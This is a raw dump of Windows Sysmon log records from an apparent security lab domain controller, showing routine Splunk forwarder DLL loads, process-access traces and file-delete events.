CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000099521Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000099520Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000099519Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000099518Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x800000000000000099517Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000099516Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000099515Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000099514Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x800000000000000099513Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000099512Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000099511Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000099510Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 10341000x800000000000000099509Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099508Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000099507Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000099506Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000099505Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exeMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9trueSplunk, Inc.Valid 10341000x800000000000000099504Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099503Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099502Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099501Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099500Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-A252-6294-0500-000000005502}416432C:\Windows\system32\csrss.exe{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000099499Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000099498Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.069{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000099551Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:53.506{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F24B4B624AD9668F28434B0CB09AE17E,SHA256=63D12EBD5B53ADB7F9DEA7E0EFCDB74EAE0294E579C0BBBD9C81CC83D8644AE3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099587Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.646{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F45F306F096773104D502802468EB3DE,SHA256=7DEFC604DFDAF37AE8082EC1045B5EB6E99DEF97AFB14353052354E3E21C90C5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000099586Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099585Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099584Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099583Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099582Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099581Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099580Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099579Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099578Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099577Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 